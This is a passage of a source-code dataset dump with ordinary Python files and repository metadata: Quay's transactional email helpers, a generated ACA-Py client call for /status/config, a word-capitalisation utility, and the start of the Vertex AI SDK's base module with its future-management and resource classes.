            logger.debug("Sent email: '%s'", msg.subject)
    except Exception as ex:
        logger.exception("Error while trying to send email to %s", recipient)
        raise CannotSendEmailException(str(ex))
def render_email(app_title, app_url, recipient, subject, template_file, parameters, action=None):
    """Render the named email template to (html, plain_text).

    The same template is rendered twice: once with the base layout for the
    HTML part, and once without it, which is then converted to plain text.
    `action`, when given, is embedded as JSON Gmail-action metadata.
    """
    def app_link_handler(url=None):
        # Template helper: build an absolute app URL (root when url is None).
        return app_url + "/" + url if url else app_url
    app_logo = app_config.get("ENTERPRISE_LOGO_URL", "https://quay.io/static/img/quay-logo.png")
    parameters.update(
        {
            "subject": subject,
            "app_logo": app_logo,
            "app_url": app_url,
            "app_title": app_title,
            "hosted": features.BILLING,
            "app_link": app_link_handler,
            "action_metadata": json.dumps(action.metadata) if action else None,
            "with_base_template": True,
        }
    )
    rendered_html = template_env.get_template(template_file + ".html").render(parameters)
    parameters.update(
        {
            "with_base_template": False,
        }
    )
    rendered_for_plain = template_env.get_template(template_file + ".html").render(parameters)
    return rendered_html, html2text(rendered_for_plain)
def send_password_changed(username, email):
    """Notify `email` that the account password was changed."""
    send_email(email, "Account password changed", "passwordchanged", {"username": username})
def send_email_changed(username, old_email, new_email):
    """Notify the *old* address that the account e-mail was changed."""
    send_email(
        old_email,
        "Account e-mail address changed",
        "emailchanged",
        {"username": username, "new_email": new_email},
    )
def send_change_email(username, email, token):
    """Send the e-mail-change confirmation message carrying `token`."""
    send_email(
        email,
        "E-mail address change requested",
        "changeemail",
        {"username": username, "token": token},
    )
def send_confirmation_email(username, email, token):
    """Send the address-verification message with a Gmail confirm action."""
    action = GmailAction.confirm(
        "Confirm E-mail", "confirm?code=" + token, "Verification of e-mail address"
    )
    send_email(
        email,
        "Please confirm your e-mail address",
        "confirmemail",
        {"username": username, "token": token},
        action=action,
    )
def send_repo_authorization_email(namespace, repository, email, token):
    """Ask `email` to verify itself for the given repository."""
    action = GmailAction.confirm(
        "Verify E-mail", "authrepoemail?code=" + token, "Verification of e-mail address"
    )
    subject = "Please verify your e-mail address for repository %s/%s" % (namespace, repository)
    send_email(
        email,
        subject,
        "repoauthorizeemail",
        {"namespace": namespace, "repository": repository, "token": token},
        action=action,
    )
def send_org_recovery_email(org, admin_users):
    """E-mail the organization's address listing the admins who can recover it."""
    subject = "Organization %s recovery" % (org.username)
    send_email(
        org.email,
        subject,
        "orgrecovery",
        {
            "organization": org.username,
            "admin_usernames": [user.username for user in admin_users],
        },
    )
def send_recovery_email(email, token):
    """Send an account-recovery link for the given address."""
    view_action = GmailAction.view(
        "Recover Account", "recovery?code=" + token, "Recovery of an account"
    )
    template_params = {"email": email, "token": token}
    send_email(email, "Account recovery", "recovery", template_params, action=view_action)
def send_payment_failed(email, username):
    """Tell a user that their subscription payment did not go through."""
    template_params = {"username": username}
    send_email(email, "Subscription Payment Failure", "paymentfailure", template_params)
def send_org_invite_email(member_name, member_email, orgname, team, adder, code):
    """Invite a prospective member (by e-mail) to join a team in an organization.

    ``member_name`` is accepted for interface compatibility but is not used in
    the message body.
    """
    join_action = GmailAction.view(
        "Join %s" % team, "confirminvite?code=" + code, "Invitation to join a team"
    )
    template_params = {
        "inviter": adder,
        "token": code,
        "organization": orgname,
        "teamname": team,
    }
    send_email(member_email, "Invitation to join team", "teaminvite", template_params, action=join_action)
def send_invoice_email(email, contents):
    """Send a pre-rendered invoice e-mail; ``contents`` is the full HTML body."""
    # Note: This completely generates the contents of the email, so we don't use the
    # normal template here.
    msg = Message("Quay payment received - Thank you!", recipients=[email])
    msg.html = contents

    if features.FIPS:
        assert app_config["MAIL_USE_TLS"], "MAIL_USE_TLS must be enabled to use SMTP in FIPS mode."
        # NOTE(review): patches smtplib's AUTH handshake at runtime — presumably
        # login_fips_safe avoids non-FIPS digests; confirm its contract.
        with mock.patch("smtplib.SMTP.login", login_fips_safe):
            mail.send(msg)
    else:
        mail.send(msg)
def send_logs_exported_email(
    email, export_id, status, exported_data_url=None, exported_data_expiration=None
):
    """Notify a user that their action-log export has completed (or failed)."""
    template_params = {
        "status": status,
        "export_id": export_id,
        "exported_data_url": exported_data_url,
        "exported_data_expiration": exported_data_expiration,
    }
    send_email(email, "Export Action Logs Complete", "logsexported", template_params)
# INTERNAL EMAILS BELOW
def send_subscription_change(change_description, customer_id, customer_email, quay_username):
    """Send an internal notification (to stripe@quay.io) about a billing change."""
    SUBSCRIPTION_CHANGE_TITLE = "Subscription Change - {0} {1}"
    SUBSCRIPTION_CHANGE = """
    Change: {0}<br>
    Customer id: <a href="https://manage.stripe.com/customers/{1}">{1}</a><br>
    Customer email: <a href="mailto:{2}">{2}</a><br>
    Quay user or org name: {3}<br>
    """

    title = SUBSCRIPTION_CHANGE_TITLE.format(quay_username, change_description)
    msg = Message(title, recipients=["stripe@quay.io"])
    msg.html = SUBSCRIPTION_CHANGE.format(
        change_description, customer_id, customer_email, quay_username
    )

    if features.FIPS:
        assert app_config["MAIL_USE_TLS"], "MAIL_USE_TLS must be enabled to use SMTP in FIPS mode."
        # NOTE(review): same runtime smtplib patch as send_invoice_email — keep in sync.
        with mock.patch("smtplib.SMTP.login", login_fips_safe):
            mail.send(msg)
    else:
        mail.send(msg)
| 30.582375 | 100 | 0.62879 |
ace8e76de88d5fdf1746e11c5e1ef93407d64fd2 | 1,900 | py | Python | acapy_client/api/server/get_status_config.py | Indicio-tech/acapy-client | 0bd47af23308362db749c2671a3e7f8259855897 | [
"Apache-2.0"
] | 4 | 2021-08-05T09:20:34.000Z | 2021-08-08T19:37:29.000Z | acapy_client/api/server/get_status_config.py | Indicio-tech/acapy-client | 0bd47af23308362db749c2671a3e7f8259855897 | [
"Apache-2.0"
] | null | null | null | acapy_client/api/server/get_status_config.py | Indicio-tech/acapy-client | 0bd47af23308362db749c2671a3e7f8259855897 | [
"Apache-2.0"
] | 2 | 2021-08-12T18:18:45.000Z | 2021-08-14T13:22:28.000Z | from typing import Any, Dict, Optional
import httpx
from ...client import Client
from ...models.admin_config import AdminConfig
from ...types import Response
def _get_kwargs(
    *,
    client: Client,
) -> Dict[str, Any]:
    """Build the httpx keyword arguments for a GET of /status/config."""
    return {
        "url": "{}/status/config".format(client.base_url),
        "headers": client.get_headers(),
        "cookies": client.get_cookies(),
        "timeout": client.get_timeout(),
    }
def _parse_response(*, response: httpx.Response) -> Optional[AdminConfig]:
    """Deserialize a 200 response body; any other status yields None."""
    if response.status_code != 200:
        return None
    return AdminConfig.from_dict(response.json())
def _build_response(*, response: httpx.Response) -> Response[AdminConfig]:
    """Wrap the raw httpx response in the generated Response container."""
    parsed_body = _parse_response(response=response)
    return Response(
        status_code=response.status_code,
        content=response.content,
        headers=response.headers,
        parsed=parsed_body,
    )
def sync_detailed(
    *,
    client: Client,
) -> Response[AdminConfig]:
    """Fetch the server config synchronously, returning the full Response."""
    request_kwargs = _get_kwargs(client=client)
    raw_response = httpx.get(verify=client.verify_ssl, **request_kwargs)
    return _build_response(response=raw_response)
def sync(
    *,
    client: Client,
) -> Optional[AdminConfig]:
    """Fetch the server config synchronously, returning only the parsed body."""
    detailed = sync_detailed(client=client)
    return detailed.parsed
async def asyncio_detailed(
    *,
    client: Client,
) -> Response[AdminConfig]:
    """Fetch the server config asynchronously, returning the full Response."""
    request_kwargs = _get_kwargs(client=client)
    async with httpx.AsyncClient(verify=client.verify_ssl) as session:
        raw_response = await session.get(**request_kwargs)
    return _build_response(response=raw_response)
async def asyncio(
    *,
    client: Client,
) -> Optional[AdminConfig]:
    """Fetch the server config asynchronously, returning only the parsed body."""
    detailed = await asyncio_detailed(client=client)
    return detailed.parsed
| 19.791667 | 74 | 0.628947 |
ace8e7af5f48232cc5b1fd05a750d5571e7efeaa | 512 | py | Python | dataUtils/utils/capitalize_words.py | ichang1/covid-tracker-backend | c33dbf671684365a950d2c179fb6cb1042271510 | [
"MIT"
] | 1 | 2021-09-06T04:46:08.000Z | 2021-09-06T04:46:08.000Z | dataUtils/utils/capitalize_words.py | ichang1/covid-tracker-backend | c33dbf671684365a950d2c179fb6cb1042271510 | [
"MIT"
] | null | null | null | dataUtils/utils/capitalize_words.py | ichang1/covid-tracker-backend | c33dbf671684365a950d2c179fb6cb1042271510 | [
"MIT"
def capitalize_words(string):
    """Return *string* with the first letter of every word upper-cased.

    A "word" is a maximal run of alphabetic characters; the first letter of
    each run is upper-cased, subsequent letters are lower-cased, and
    non-alphabetic characters are kept as-is (they act as word separators).

    The previous implementation rebuilt the entire string at every word
    boundary via slicing + ``str.capitalize`` (quadratic time); this version
    produces the same result in a single left-to-right pass.
    """
    pieces = []
    prev_was_alpha = False
    for ch in string:
        if ch.isalpha():
            # First letter of a word is capitalized; the rest are lowered,
            # matching what repeated str.capitalize() calls produced before.
            pieces.append(ch.lower() if prev_was_alpha else ch.upper())
            prev_was_alpha = True
        else:
            pieces.append(ch)
            prev_was_alpha = False
    return "".join(pieces)
| 28.444444 | 60 | 0.5 |
ace8e84b36197bd07990c135d0932b19932dcd3c | 46,893 | py | Python | google/cloud/aiplatform/base.py | xxxtrillionarie/GCP_MLOps_VertexAI_Workshop | d0d719c0bf557b908eb63f3a245db2f47b136eb3 | [
"Apache-2.0"
] | 1 | 2022-03-30T05:23:29.000Z | 2022-03-30T05:23:29.000Z | google/cloud/aiplatform/base.py | xxxtrillionarie/GCP_MLOps_VertexAI_Workshop | d0d719c0bf557b908eb63f3a245db2f47b136eb3 | [
"Apache-2.0"
] | null | null | null | google/cloud/aiplatform/base.py | xxxtrillionarie/GCP_MLOps_VertexAI_Workshop | d0d719c0bf557b908eb63f3a245db2f47b136eb3 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
from concurrent import futures
import datetime
import functools
import inspect
import logging
import sys
import threading
import time
from typing import (
Any,
Callable,
Dict,
List,
Iterable,
Optional,
Sequence,
Tuple,
Type,
Union,
)
import proto
from google.api_core import retry
from google.api_core import operation
from google.auth import credentials as auth_credentials
from google.cloud.aiplatform import initializer
from google.cloud.aiplatform import utils
from google.cloud.aiplatform.compat.types import encryption_spec as gca_encryption_spec
from google.protobuf import json_format
# Route all INFO-and-above log records for the process to stdout.
logging.basicConfig(level=logging.INFO, stream=sys.stdout)

# This is the default retry callback to be used with get methods.
_DEFAULT_RETRY = retry.Retry()
class Logger:
    """Thin wrapper around :mod:`logging` with SDK-specific helper methods."""

    def __init__(self, name: str = ""):
        """Create a wrapper around the stdlib logger registered under ``name``."""
        self._logger = logging.getLogger(name)

    def log_create_with_lro(
        self,
        cls: Type["VertexAiResourceNoun"],
        lro: Optional[operation.Operation] = None,
    ):
        """Log that creation of ``cls`` started, plus its backing LRO if given."""
        info = self._logger.info
        info(f"Creating {cls.__name__}")
        if lro:
            info(f"Create {cls.__name__} backing LRO: {lro.operation.name}")

    def log_create_complete(
        self,
        cls: Type["VertexAiResourceNoun"],
        resource: proto.Message,
        variable_name: str,
    ):
        """Log that creation finished, with a snippet to re-instantiate the resource."""
        info = self._logger.info
        info(f"{cls.__name__} created. Resource name: {resource.name}")
        info(f"To use this {cls.__name__} in another session:")
        info(f"{variable_name} = aiplatform.{cls.__name__}('{resource.name}')")

    def log_create_complete_with_getter(
        self,
        cls: Type["VertexAiResourceNoun"],
        resource: proto.Message,
        variable_name: str,
    ):
        """Like :meth:`log_create_complete`, but the code snippet uses ``.get()``."""
        info = self._logger.info
        info(f"{cls.__name__} created. Resource name: {resource.name}")
        info(f"To use this {cls.__name__} in another session:")
        info(f"{variable_name} = aiplatform.{cls.__name__}.get('{resource.name}')")

    def log_action_start_against_resource(
        self, action: str, noun: str, resource_noun_obj: "VertexAiResourceNoun"
    ):
        """Log the intention to perform ``action`` on ``resource_noun_obj``.

        Both ``action`` and ``noun`` may be empty strings.
        """
        self._logger.info(
            f"{action} {resource_noun_obj.__class__.__name__} {noun}: {resource_noun_obj.resource_name}"
        )

    def log_action_started_against_resource_with_lro(
        self,
        action: str,
        noun: str,
        cls: Type["VertexAiResourceNoun"],
        lro: operation.Operation,
    ):
        """Log that ``action`` started, together with its backing LRO name."""
        self._logger.info(
            f"{action} {cls.__name__} {noun} backing LRO: {lro.operation.name}"
        )

    def log_action_completed_against_resource(
        self, noun: str, action: str, resource_noun_obj: "VertexAiResourceNoun"
    ):
        """Log that ``action`` completed against ``resource_noun_obj``."""
        self._logger.info(
            f"{resource_noun_obj.__class__.__name__} {noun} {action}. Resource name: {resource_noun_obj.resource_name}"
        )

    def __getattr__(self, attr: str):
        """Delegate anything not defined on this wrapper to the stdlib logger."""
        return getattr(self._logger, attr)
# Module-level logger instance used throughout this module.
_LOGGER = Logger(__name__)
class FutureManager(metaclass=abc.ABCMeta):
    """Tracks concurrent futures against this object."""

    def __init__(self):
        # Guards both __latest_future and _exception below.
        self.__latest_future_lock = threading.Lock()

        # Always points to the latest future. All submitted futures will always
        # form a dependency on the latest future.
        self.__latest_future = None

        # Caches Exception of any executed future. Once one exception occurs
        # all additional futures should fail and any additional invocations will block.
        self._exception = None

    def _raise_future_exception(self):
        """Raises exception if one of the object's futures has raised."""
        with self.__latest_future_lock:
            if self._exception:
                raise self._exception

    def _complete_future(self, future: futures.Future):
        """Checks for exception of future and removes the pointer if it's still
        latest.

        Args:
            future (futures.Future): Required. A future to complete.
        """
        with self.__latest_future_lock:
            try:
                future.result()  # raises
            except Exception as e:
                # Cache the first failure; _raise_future_exception re-raises it.
                self._exception = e

            if self.__latest_future is future:
                self.__latest_future = None

    def _are_futures_done(self) -> bool:
        """Helper method to check to all futures are complete.

        Returns:
            True if no latest future.
        """
        with self.__latest_future_lock:
            return self.__latest_future is None

    def wait(self):
        """Helper method to that blocks until all futures are complete."""
        future = self.__latest_future
        if future:
            futures.wait([future], return_when=futures.FIRST_EXCEPTION)

        self._raise_future_exception()

    @property
    def _latest_future(self) -> Optional[futures.Future]:
        """Get the latest future if it exists."""
        with self.__latest_future_lock:
            return self.__latest_future

    @_latest_future.setter
    def _latest_future(self, future: Optional[futures.Future]):
        """Optionally set the latest future and add a complete_future
        callback."""
        with self.__latest_future_lock:
            self.__latest_future = future

        # Callback is registered outside the lock: it may fire immediately and
        # _complete_future re-acquires the (non-reentrant) lock.
        if future:
            future.add_done_callback(self._complete_future)

    def _submit(
        self,
        method: Callable[..., Any],
        args: Sequence[Any],
        kwargs: Dict[str, Any],
        additional_dependencies: Optional[Sequence[futures.Future]] = None,
        callbacks: Optional[Sequence[Callable[[futures.Future], Any]]] = None,
        internal_callbacks: Iterable[Callable[[Any], Any]] = None,
    ) -> futures.Future:
        """Submit a method as a future against this object.

        Args:
            method (Callable): Required. The method to submit.
            args (Sequence): Required. The arguments to call the method with.
            kwargs (dict): Required. The keyword arguments to call the method with.
            additional_dependencies (Optional[Sequence[futures.Future]]):
                Optional. Additional dependent futures to wait on before executing
                method. Note: No validation is done on the dependencies.
            callbacks (Optional[Sequence[Callable[[futures.Future], Any]]]):
                Optional. Additional Future callbacks to execute once this created
                Future is complete.
        Returns:
            future (Future): Future of the submitted method call.
        """

        def wait_for_dependencies_and_invoke(
            deps: Sequence[futures.Future],
            method: Callable[..., Any],
            args: Sequence[Any],
            kwargs: Dict[str, Any],
            internal_callbacks: Iterable[Callable[[Any], Any]],
        ) -> Any:
            """Wrapper method to wait on any dependencies before submitting
            method.

            Args:
                deps (Sequence[futures.Future]):
                    Required. Dependent futures to wait on before executing method.
                    Note: No validation is done on the dependencies.
                method (Callable): Required. The method to submit.
                args (Sequence[Any]): Required. The arguments to call the method with.
                kwargs (Dict[str, Any]):
                    Required. The keyword arguments to call the method with.
                internal_callbacks: (Callable[[Any], Any]):
                    Callbacks that take the result of method.
            """
            # Blocks (and re-raises) on every upstream dependency first.
            for future in set(deps):
                future.result()

            result = method(*args, **kwargs)

            # call callbacks from within future
            if internal_callbacks:
                for callback in internal_callbacks:
                    callback(result)

            return result

        # Retrieves any dependencies from arguments.
        deps = [
            arg._latest_future
            for arg in list(args) + list(kwargs.values())
            if isinstance(arg, FutureManager)
        ]

        # Retrieves exceptions and raises
        # if any upstream dependency has an exception
        exceptions = [
            arg._exception
            for arg in list(args) + list(kwargs.values())
            if isinstance(arg, FutureManager) and arg._exception
        ]

        if exceptions:
            raise exceptions[0]

        # filter out objects that do not have pending tasks
        deps = [dep for dep in deps if dep]

        if additional_dependencies:
            deps.extend(additional_dependencies)

        with self.__latest_future_lock:

            # form a dependency on the latest future of this object
            if self.__latest_future:
                deps.append(self.__latest_future)

            self.__latest_future = initializer.global_pool.submit(
                wait_for_dependencies_and_invoke,
                deps=deps,
                method=method,
                args=args,
                kwargs=kwargs,
                internal_callbacks=internal_callbacks,
            )

            future = self.__latest_future

        # Clean up callback captures exception as well as removes future.
        # May execute immediately and take lock.
        future.add_done_callback(self._complete_future)

        if callbacks:
            for c in callbacks:
                future.add_done_callback(c)

        return future

    @classmethod
    @abc.abstractmethod
    def _empty_constructor(cls) -> "FutureManager":
        """Should construct object with all non FutureManager attributes as
        None."""
        pass

    @abc.abstractmethod
    def _sync_object_with_future_result(self, result: "FutureManager"):
        """Should sync the object from _empty_constructor with result of
        future."""

    def __repr__(self) -> str:
        if self._exception:
            return f"{object.__repr__(self)} failed with {str(self._exception)}"

        if self.__latest_future:
            return f"{object.__repr__(self)} is waiting for upstream dependencies to complete."

        return object.__repr__(self)
class VertexAiResourceNoun(metaclass=abc.ABCMeta):
    """Base class for the Vertex AI resource nouns.

    Subclasses require two class attributes:

    client_class: The client to instantiate to interact with this resource noun.

    Subclass is required to populate private attribute _gca_resource which is the
    service representation of the resource noun.
    """

    @property
    @classmethod
    @abc.abstractmethod
    def client_class(cls) -> Type[utils.VertexAiServiceClientWithOverride]:
        """Client class required to interact with resource with optional
        overrides."""
        pass

    @property
    @classmethod
    @abc.abstractmethod
    def _getter_method(cls) -> str:
        """Name of getter method of client class for retrieving the
        resource."""
        pass

    @property
    @classmethod
    @abc.abstractmethod
    def _delete_method(cls) -> str:
        """Name of delete method of client class for deleting the resource."""
        pass

    @property
    @classmethod
    @abc.abstractmethod
    def _resource_noun(cls) -> str:
        """Resource noun."""
        pass

    @property
    @classmethod
    @abc.abstractmethod
    def _parse_resource_name_method(cls) -> str:
        """Method name on GAPIC client to parse a resource name."""
        pass

    @property
    @classmethod
    @abc.abstractmethod
    def _format_resource_name_method(self) -> str:
        """Method name on GAPIC client to format a resource name."""
        pass

    # Override this value with staticmethod
    # to use custom resource id validators per resource
    _resource_id_validator: Optional[Callable[[str], None]] = None

    def __init__(
        self,
        project: Optional[str] = None,
        location: Optional[str] = None,
        credentials: Optional[auth_credentials.Credentials] = None,
        resource_name: Optional[str] = None,
    ):
        """Initializes class with project, location, and api_client.

        Args:
            project(str): Project of the resource noun.
            location(str): The location of the resource noun.
            credentials(google.auth.credentials.Credentials): Optional custom
                credentials to use when accessing interacting with resource noun.
            resource_name(str): A fully-qualified resource name or ID.
        """
        # A fully-qualified resource name carries its own project/location;
        # those win over (and are validated against) the passed-in values.
        if resource_name:
            project, location = self._get_and_validate_project_location(
                resource_name=resource_name, project=project, location=location
            )

        self.project = project or initializer.global_config.project
        self.location = location or initializer.global_config.location
        self.credentials = credentials or initializer.global_config.credentials

        self.api_client = self._instantiate_client(self.location, self.credentials)

    @classmethod
    def _instantiate_client(
        cls,
        location: Optional[str] = None,
        credentials: Optional[auth_credentials.Credentials] = None,
    ) -> utils.VertexAiServiceClientWithOverride:
        """Helper method to instantiate service client for resource noun.

        Args:
            location (str): The location of the resource noun.
            credentials (google.auth.credentials.Credentials):
                Optional custom credentials to use when accessing interacting with
                resource noun.
        Returns:
            client (utils.VertexAiServiceClientWithOverride):
                Initialized service client for this service noun with optional overrides.
        """
        return initializer.global_config.create_client(
            client_class=cls.client_class,
            credentials=credentials,
            location_override=location,
        )

    @classmethod
    def _parse_resource_name(cls, resource_name: str) -> Dict[str, str]:
        """
        Parses resource name into its component segments.

        Args:
            resource_name: Resource name of this resource.
        Returns:
            Dictionary of component segments.
        """
        # gets the underlying wrapped gapic client class
        return getattr(
            cls.client_class.get_gapic_client_class(), cls._parse_resource_name_method
        )(resource_name)

    @classmethod
    def _format_resource_name(cls, **kwargs: str) -> str:
        """
        Formats a resource name using its component segments.

        Args:
            **kwargs: Resource name parts. Singular and snake case. ie:

            format_resource_name(
                project='my-project',
                location='us-central1'
            )
        Returns:
            Resource name.
        """
        # gets the underlying wrapped gapic client class
        return getattr(
            cls.client_class.get_gapic_client_class(), cls._format_resource_name_method
        )(**kwargs)

    def _get_and_validate_project_location(
        self,
        resource_name: str,
        project: Optional[str] = None,
        location: Optional[str] = None,
    ) -> Tuple[str, str]:
        """Validate the project and location for the resource.

        Args:
            resource_name(str): Required. A fully-qualified resource name or ID.
            project(str): Project of the resource noun.
            location(str): The location of the resource noun.

        Raises:
            RuntimeError: If location is different from resource location
        """
        fields = self._parse_resource_name(resource_name)

        # Not a fully-qualified name (e.g. a bare ID): keep the caller's values.
        if not fields:
            return project, location

        if location and fields["location"] != location:
            raise RuntimeError(
                f"location {location} is provided, but different from "
                f"the resource location {fields['location']}"
            )

        return fields["project"], fields["location"]

    def _get_gca_resource(
        self,
        resource_name: str,
        parent_resource_name_fields: Optional[Dict[str, str]] = None,
    ) -> proto.Message:
        """Returns GAPIC service representation of client class resource.

        Args:
            resource_name (str): Required. A fully-qualified resource name or ID.
            parent_resource_name_fields (Dict[str,str]):
                Optional. Mapping of parent resource name key to values. These
                will be used to compose the resource name if only resource ID is given.
                Should not include project and location.
        """
        resource_name = utils.full_resource_name(
            resource_name=resource_name,
            resource_noun=self._resource_noun,
            parse_resource_name_method=self._parse_resource_name,
            format_resource_name_method=self._format_resource_name,
            project=self.project,
            location=self.location,
            parent_resource_name_fields=parent_resource_name_fields,
            resource_id_validator=self._resource_id_validator,
        )

        return getattr(self.api_client, self._getter_method)(
            name=resource_name, retry=_DEFAULT_RETRY
        )

    def _sync_gca_resource(self):
        """Sync GAPIC service representation of client class resource."""
        self._gca_resource = self._get_gca_resource(resource_name=self.resource_name)

    @property
    def name(self) -> str:
        """Name of this resource."""
        self._assert_gca_resource_is_available()
        # The final path segment of the fully-qualified resource name.
        return self._gca_resource.name.split("/")[-1]

    @property
    def resource_name(self) -> str:
        """Full qualified resource name."""
        self._assert_gca_resource_is_available()
        return self._gca_resource.name

    @property
    def display_name(self) -> str:
        """Display name of this resource."""
        self._assert_gca_resource_is_available()
        return self._gca_resource.display_name

    @property
    def create_time(self) -> datetime.datetime:
        """Time this resource was created."""
        self._assert_gca_resource_is_available()
        return self._gca_resource.create_time

    @property
    def update_time(self) -> datetime.datetime:
        """Time this resource was last updated."""
        # NOTE: unlike the other properties, this one re-fetches the resource
        # from the service (network call) before reading the field.
        self._sync_gca_resource()
        return self._gca_resource.update_time

    @property
    def encryption_spec(self) -> Optional[gca_encryption_spec.EncryptionSpec]:
        """Customer-managed encryption key options for this Vertex AI resource.

        If this is set, then all resources created by this Vertex AI resource will
        be encrypted with the provided encryption key.
        """
        self._assert_gca_resource_is_available()
        return getattr(self._gca_resource, "encryption_spec")

    @property
    def labels(self) -> Dict[str, str]:
        """User-defined labels containing metadata about this resource.

        Read more about labels at https://goo.gl/xmQnxf
        """
        self._assert_gca_resource_is_available()
        return dict(self._gca_resource.labels)

    @property
    def gca_resource(self) -> proto.Message:
        """The underlying resource proto representation."""
        self._assert_gca_resource_is_available()
        return self._gca_resource

    @property
    def _resource_is_available(self) -> bool:
        """Returns True if GCA resource has been created and is available, otherwise False"""
        try:
            self._assert_gca_resource_is_available()
            return True
        except RuntimeError:
            return False

    def _assert_gca_resource_is_available(self) -> None:
        """Helper method to raise when property is not accessible.

        Raises:
            RuntimeError: If _gca_resource is has not been created.
        """
        if self._gca_resource is None:
            raise RuntimeError(
                f"{self.__class__.__name__} resource has not been created"
            )

    def __repr__(self) -> str:
        return f"{object.__repr__(self)} \nresource name: {self.resource_name}"

    def to_dict(self) -> Dict[str, Any]:
        """Returns the resource proto as a dictionary."""
        return json_format.MessageToDict(self.gca_resource._pb)
def optional_sync(
    construct_object_on_arg: Optional[str] = None,
    return_input_arg: Optional[str] = None,
    bind_future_to_self: bool = True,
):
    """Decorator for VertexAiResourceNounWithFutureManager with optional sync
    support.

    Methods with this decorator should include a "sync" argument that defaults to
    True. If called with sync=False this decorator will launch the method as a
    concurrent Future in a separate Thread.

    Note that this is only robust enough to support our current end to end patterns
    and may not be suitable for new patterns.

    Args:
        construct_object_on_arg (str):
            Optional. If provided, will only construct output object if arg is present.
            Example: If custom training does not produce a model.
        return_input_arg (str):
            Optional. If provided will return passed in argument instead of
            constructing.
            Example: Model.deploy(Endpoint) returns the passed in Endpoint
        bind_future_to_self (bool):
            Whether to add this future to the calling object.
            Example: Model.deploy(Endpoint) would be set to False because we only
            want the deployment Future to be associated with Endpoint.
    """

    def optional_run_in_thread(method: Callable[..., Any]):
        """Optionally run this method concurrently in separate Thread.

        Args:
            method (Callable[..., Any]): Method to optionally run in separate Thread.
        """

        @functools.wraps(method)
        def wrapper(*args, **kwargs):
            """Wraps method."""
            # "sync" is consumed here and never forwarded to the wrapped method.
            sync = kwargs.pop("sync", True)
            bound_args = inspect.signature(method).bind(*args, **kwargs)
            self = bound_args.arguments.get("self")
            calling_object_latest_future = None

            # check to see if this object has any exceptions
            if self:
                calling_object_latest_future = self._latest_future
                self._raise_future_exception()

            # if sync then wait for any Futures to complete and execute
            if sync:
                if self:
                    VertexAiResourceNounWithFutureManager.wait(self)
                return method(*args, **kwargs)

            # callbacks to call within the Future (in same Thread)
            internal_callbacks = []
            # callbacks to add to the Future (may or may not be in same Thread)
            callbacks = []
            # additional Future dependencies to capture
            dependencies = []

            # all methods should have type signatures
            return_type = get_annotation_class(
                inspect.getfullargspec(method).annotations["return"]
            )

            # object produced by the method
            returned_object = bound_args.arguments.get(return_input_arg)

            # is a classmethod that creates the object and returns it
            if args and inspect.isclass(args[0]):

                # assumes class in classmethod is the resource noun
                returned_object = (
                    args[0]._empty_constructor()
                    if not returned_object
                    else returned_object
                )
                self = returned_object

            else:  # instance method

                # if we're returning an input object
                if returned_object and returned_object is not self:

                    # make sure the input object doesn't have any exceptions
                    # from previous futures
                    returned_object._raise_future_exception()

                # if we need to construct a new empty returned object
                should_construct = not returned_object and bound_args.arguments.get(
                    construct_object_on_arg, not construct_object_on_arg
                )

                if should_construct:
                    if return_type is not None:
                        returned_object = return_type._empty_constructor()

                # if the future will be associated with both the returned object
                # and calling object then we need to add additional callback
                # to remove the future from the returned object
                if returned_object and bind_future_to_self:
                    callbacks.append(returned_object._complete_future)

            if returned_object:
                # sync objects after future completes
                internal_callbacks.append(
                    returned_object._sync_object_with_future_result
                )

            # If the future is not associated with the calling object
            # then the return object future needs to form a dependency on the
            # the latest future in the calling object.
            if not bind_future_to_self:
                if calling_object_latest_future:
                    dependencies.append(calling_object_latest_future)
                self = returned_object

            future = self._submit(
                method=method,
                callbacks=callbacks,
                internal_callbacks=internal_callbacks,
                additional_dependencies=dependencies,
                args=[],
                kwargs=bound_args.arguments,
            )

            # if the calling object is the one that submitted then add it's future
            # to the returned object
            if returned_object and returned_object is not self:
                returned_object._latest_future = future

            return returned_object

        return wrapper

    return optional_run_in_thread
class VertexAiResourceNounWithFutureManager(VertexAiResourceNoun, FutureManager):
"""Allows optional asynchronous calls to this Vertex AI Resource
Nouns."""
    def __init__(
        self,
        project: Optional[str] = None,
        location: Optional[str] = None,
        credentials: Optional[auth_credentials.Credentials] = None,
        resource_name: Optional[str] = None,
    ):
        """Initializes class with project, location, and api_client.

        Args:
            project (str): Optional. Project of the resource noun.
            location (str): Optional. The location of the resource noun.
            credentials(google.auth.credentials.Credentials):
                Optional. custom credentials to use when accessing interacting with
                resource noun.
            resource_name(str): A fully-qualified resource name or ID.
        """
        # Both bases are initialized explicitly (no cooperative super() chain)
        # so each receives exactly the arguments it expects.
        VertexAiResourceNoun.__init__(
            self,
            project=project,
            location=location,
            credentials=credentials,
            resource_name=resource_name,
        )
        FutureManager.__init__(self)
    @classmethod
    def _empty_constructor(
        cls,
        project: Optional[str] = None,
        location: Optional[str] = None,
        credentials: Optional[auth_credentials.Credentials] = None,
        resource_name: Optional[str] = None,
    ) -> "VertexAiResourceNounWithFutureManager":
        """Initializes with all attributes set to None.

        The attributes should be populated after a future is complete. This allows
        scheduling of additional API calls before the resource is created.

        Args:
            project (str): Optional. Project of the resource noun.
            location (str): Optional. The location of the resource noun.
            credentials(google.auth.credentials.Credentials):
                Optional. custom credentials to use when accessing interacting with
                resource noun.
            resource_name(str): A fully-qualified resource name or ID.
        Returns:
            An instance of this class with attributes set to None.
        """
        # __new__ bypasses this class's __init__ so no service calls are made;
        # the bases are then initialized directly.
        self = cls.__new__(cls)
        VertexAiResourceNoun.__init__(
            self,
            project=project,
            location=location,
            credentials=credentials,
            resource_name=resource_name,
        )
        FutureManager.__init__(self)
        # No backing proto yet; populated once the creation future resolves.
        self._gca_resource = None
        return self
    def _sync_object_with_future_result(
        self, result: "VertexAiResourceNounWithFutureManager"
    ):
        """Populates attributes from a Future result to this object.

        Args:
            result: VertexAiResourceNounWithFutureManager
                Required. Result of future with same type as this object.
        """
        # Attributes that are always copied from the completed result.
        sync_attributes = [
            "project",
            "location",
            "api_client",
            "_gca_resource",
            "credentials",
        ]
